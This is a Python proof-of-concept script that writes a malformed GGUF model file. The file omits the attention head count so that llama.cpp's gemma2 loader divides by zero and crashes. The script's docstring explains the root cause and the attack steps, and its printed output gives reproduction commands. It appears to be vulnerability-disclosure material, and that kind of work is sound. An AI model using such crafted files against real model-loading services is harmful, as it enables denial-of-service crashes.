File size: 7,537 Bytes
ebf72e8 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 | #!/usr/bin/env python3
"""
PoC: Integer division-by-zero (SIGFPE / UB) in llama.cpp gemma2 architecture loading.
Vulnerability: In src/llama-model.cpp, the LLM_ARCH_GEMMA2 handler computes:
hparams.f_attention_scale = type == LLM_TYPE_27B
? 1.0f / std::sqrt(float(hparams.n_embd / hparams.n_head(0)))
: 1.0f / std::sqrt(float(hparams.n_embd_head_k));
When n_layer == 46, the type is set to LLM_TYPE_27B, so the first branch is taken.
If the `attention.head_count` key is omitted from the GGUF file, the n_head_arr
stays filled with 0s (from std::fill at line 552), so n_head(0) returns 0.
This makes `hparams.n_embd / hparams.n_head(0)` an integer division by zero.
The guard at line 606 (`if (hparams.n_head() > 0)`) only protects the
n_embd_head_k calculation, not the architecture-specific code at line 1347.
Platform behavior:
- x86_64: SIGFPE (hardware trap on integer division by zero), exit code 136
- ARM64: Silent undefined behavior (ARM SDIV returns 0 for div-by-zero),
but UBSan catches it and aborts with exit code 134
Attack vector:
1. Set general.architecture = "gemma2"
2. Set gemma2.block_count = 46 (triggers LLM_TYPE_27B)
3. Set gemma2.embedding_length = 4096 (any non-zero value)
4. Set gemma2.context_length = 8192 (required)
5. Set gemma2.attention.layer_norm_rms_epsilon = 1e-6 (required for gemma2)
6. OMIT gemma2.attention.head_count (this is loaded with required=false)
7. n_head_arr stays all-zero => n_head(0) == 0 => division by zero
The crash occurs during load_hparams(), before vocab or tensor loading,
so no valid vocabulary or tensor data is needed.
Confirmed UBSan output:
src/llama-model.cpp:1347:61: runtime error: division by zero
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/llama-model.cpp:1347:61
"""
import struct
import os
# GGUF constants
GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3
GGUF_DEFAULT_ALIGNMENT = 32
# GGUF KV type constants
GGUF_TYPE_UINT32 = 4
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_STRING = 8
def write_string(f, s):
"""Write a GGUF string: uint64 length + chars (no null terminator)."""
encoded = s.encode('utf-8')
f.write(struct.pack('<Q', len(encoded)))
f.write(encoded)
def write_kv_string(f, key, value):
"""Write a KV pair with string value."""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_STRING))
write_string(f, value)
def write_kv_uint32(f, key, value):
"""Write a KV pair with uint32 value."""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_UINT32))
f.write(struct.pack('<I', value))
def write_kv_float32(f, key, value):
"""Write a KV pair with float32 value."""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
f.write(struct.pack('<f', value))
def create_gemma2_divzero_gguf(output_path):
"""Create a GGUF file that triggers integer division-by-zero in gemma2 hparams loading.
The crash occurs in load_hparams() at the LLM_ARCH_GEMMA2 case, before
vocab or tensor loading. So we need:
- A valid GGUF v3 header
- The required KV pairs for gemma2 (but NOT attention.head_count)
- Zero tensors (the crash happens before tensors are loaded)
"""
n_tensors = 0 # No tensors needed; crash is in hparams loading
n_kv = 5 # Number of KV pairs (see below)
with open(output_path, 'wb') as f:
# ===== GGUF Header =====
f.write(GGUF_MAGIC) # magic: "GGUF"
f.write(struct.pack('<I', GGUF_VERSION)) # version: 3
f.write(struct.pack('<Q', n_tensors)) # n_tensors: 0
f.write(struct.pack('<Q', n_kv)) # n_kv: 5
# ===== KV Pairs =====
# 1. general.architecture = "gemma2"
# This selects LLM_ARCH_GEMMA2 in load_arch().
write_kv_string(f, "general.architecture", "gemma2")
# 2. gemma2.context_length = 8192
# Required (loaded at line 517 with required=true).
write_kv_uint32(f, "gemma2.context_length", 8192)
# 3. gemma2.embedding_length = 4096
# Required (loaded at line 518 with required=true).
# Must be non-zero so that n_embd / n_head(0) is a non-trivial division.
write_kv_uint32(f, "gemma2.embedding_length", 4096)
# 4. gemma2.block_count = 46
# Required (loaded at line 520 with required=true).
# 46 layers triggers LLM_TYPE_27B at line 1341, which selects the
# vulnerable code path at line 1347 that divides by n_head(0).
write_kv_uint32(f, "gemma2.block_count", 46)
# 5. gemma2.attention.layer_norm_rms_epsilon = 1e-6
# Required for gemma2 (loaded at line 1334 with required=true).
# This must be present or load_hparams() throws before reaching line 1347.
write_kv_float32(f, "gemma2.attention.layer_norm_rms_epsilon", 1e-6)
# DELIBERATELY OMITTED: gemma2.attention.head_count
# This key is loaded at line 571 with required=false:
# ml.get_key_or_arr(LLM_KV_ATTENTION_HEAD_COUNT, hparams.n_head_arr, hparams.n_layer, false);
# When omitted, n_head_arr stays filled with 0s (from std::fill at line 552).
# Then at line 1347: hparams.n_embd / hparams.n_head(0) = 4096 / 0 => SIGFPE
# ===== Alignment padding =====
# Even with 0 tensors, pad to alignment boundary for spec compliance.
current_pos = f.tell()
aligned_pos = (current_pos + GGUF_DEFAULT_ALIGNMENT - 1) // GGUF_DEFAULT_ALIGNMENT * GGUF_DEFAULT_ALIGNMENT
if aligned_pos > current_pos:
f.write(b'\x00' * (aligned_pos - current_pos))
file_size = os.path.getsize(output_path)
print(f"[*] Created: {output_path}")
print(f"[*] File size: {file_size} bytes")
print(f"[*]")
print(f"[*] Vulnerability details:")
print(f"[*] Architecture: gemma2 (LLM_ARCH_GEMMA2)")
print(f"[*] block_count: 46 (triggers LLM_TYPE_27B)")
print(f"[*] embedding_length: 4096")
print(f"[*] head_count: OMITTED (stays 0 from std::fill)")
print(f"[*]")
print(f"[*] Crash location: src/llama-model.cpp:1347")
print(f"[*] hparams.n_embd / hparams.n_head(0)")
print(f"[*] = 4096 / 0")
print(f"[*] => integer division by zero (UB)")
print(f"[*]")
print(f"[*] Test with (x86_64 -- deterministic SIGFPE crash):")
print(f"[*] ./build/bin/llama-cli -m {output_path} -p 'hello'")
print(f"[*] Expected: SIGFPE, exit code 136")
print(f"[*]")
print(f"[*] Test with UBSan (any platform -- clean UB report):")
print(f"[*] cmake -B build-ubsan \\")
print(f"[*] -DCMAKE_C_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\")
print(f"[*] -DCMAKE_CXX_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\")
print(f"[*] -DCMAKE_EXE_LINKER_FLAGS='-fsanitize=undefined' \\")
print(f"[*] -DCMAKE_SHARED_LINKER_FLAGS='-fsanitize=undefined' \\")
print(f"[*] -DGGML_METAL=OFF -DGGML_BLAS=OFF -DGGML_CUDA=OFF")
print(f"[*] cmake --build build-ubsan -j$(nproc)")
print(f"[*] ./build-ubsan/bin/llama-completion -m {output_path} -p 'hello'")
print(f"[*] Expected: 'runtime error: division by zero', exit code 134")
if __name__ == "__main__":
output_dir = "/Users/eltarne/Documents/script/gguf_poc"
os.makedirs(output_dir, exist_ok=True)
output_path = os.path.join(output_dir, "poc_gemma2_divzero.gguf")
create_gemma2_divzero_gguf(output_path)
|